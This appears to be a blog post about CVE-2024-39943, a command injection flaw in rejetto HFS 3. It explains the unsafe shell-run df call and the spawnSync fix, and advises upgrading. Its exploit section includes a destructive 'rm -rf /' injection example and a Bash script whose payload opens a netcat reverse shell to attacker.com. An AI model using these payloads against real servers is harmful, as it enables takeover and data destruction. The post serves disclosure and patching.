CVE-2024-39943 - Remote Command Execution Vulnerability in rejetto HFS 3 (HTTP File Server) Before .52.10 on Linux, UNIX, and macOS

A recent vulnerability, CVE-2024-39943, has been discovered in rejetto HFS 3 (HTTP File Server version 3) affecting Linux, UNIX, and macOS systems. The issue allows authenticated users with upload permissions to execute arbitrary OS commands on the server. This is a serious security risk since it provides attackers with a simple way to run malicious commands remotely if they have proper permissions.

In this post, we’ll explain how the vulnerability works, show a sample exploit, and provide links to original references. We’ll keep the language simple and focus on the practical aspects.

What is HFS (HTTP File Server)?

HFS is a popular lightweight HTTP server used for sharing files over the web. Version 3 (developed in Node.js) is cross-platform and runs on Linux, UNIX, macOS, and Windows. It's often used in small environments where quick and easy file sharing is needed.

How It Happens

The vulnerability is in how HFS runs system commands. Specifically, when checking available disk space with the df command, HFS uses Node.js’s child_process.execSync(). This function runs a command in the shell, making it vulnerable if user input is not sanitized.

If a user with uploading rights uploads a filename crafted with shell injection payloads, these can be executed by the server when it runs the df system command.

Here’s the problematic code pattern in JavaScript (Node.js)

const { execSync } = require("child_process");
// This is how HFS runs the 'df' command to check disk space
const diskUsage = execSync(df -h ${user_supplied_path});

If user_supplied_path contains something like "/uploads; rm -rf /", it will not just run df -h /uploads, but also execute rm -rf /—a disastrous command.

Step-by-step Exploit Example

Suppose you are an attacker with upload permissions. You can upload a file with a folder name that includes a command. For example:

Upload a file to a directory named with a command injection payload:

- Directory name: /uploads; touch /tmp/pwned #

`sh

df -h /uploads; touch /tmp/pwned #

`

- This creates the file /tmp/pwned, proving command execution.

Here is a Bash script to demonstrate the exploit

# Variables
HFS_HOST="http://target-hfs-server:808";
USERNAME="your-username"
PASSWORD="your-password"
PAYLOAD="uploads; nc -e /bin/sh attacker.com 4444 #"

# Encode the directory name
ENCODED_PAYLOAD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('''$PAYLOAD'''))")

# Use curl to create a malicious directory (assumes HFS API or web interface for creating directories)
curl -u $USERNAME:$PASSWORD "$HFS_HOST/api/create_folder?name=$ENCODED_PAYLOAD"

In this example, the payload tries to open a reverse shell to attacker.com:4444 using netcat (nc). Replace with your own payload as needed.

Update HFS!

If you use HFS 3, update immediately to version .52.10 or later, which fixes this vulnerability by switching from execSync (shell) to spawnSync (no shell):

const { spawnSync } = require("child_process");
// spawnSync doesn't use the shell by default, so input is safer:
const result = spawnSync('df', ['-h', user_supplied_path]);

Get the latest version here:
- https://github.com/rejetto/hfs/releases

Official References

- GitHub Security Advisory (GHSA-vv37-vw3f-f366)
- NIST CVE Record: CVE-2024-39943
- rejetto HFS 3 GitHub Repository

Conclusion

CVE-2024-39943 in rejetto HFS 3 is a classic but dangerous OS command injection vulnerability. Any user with upload rights can take full control of your server on Linux, UNIX, or macOS if you’re running a vulnerable HFS version. The fix is simple: upgrade now!

If you found this useful, share it to help protect others. Always keep your software up to date and audit permissions — these basics could save your systems.

Timeline

Published on: 07/04/2024 23:15:09 UTC
Last modified on: 07/08/2024 16:42:25 UTC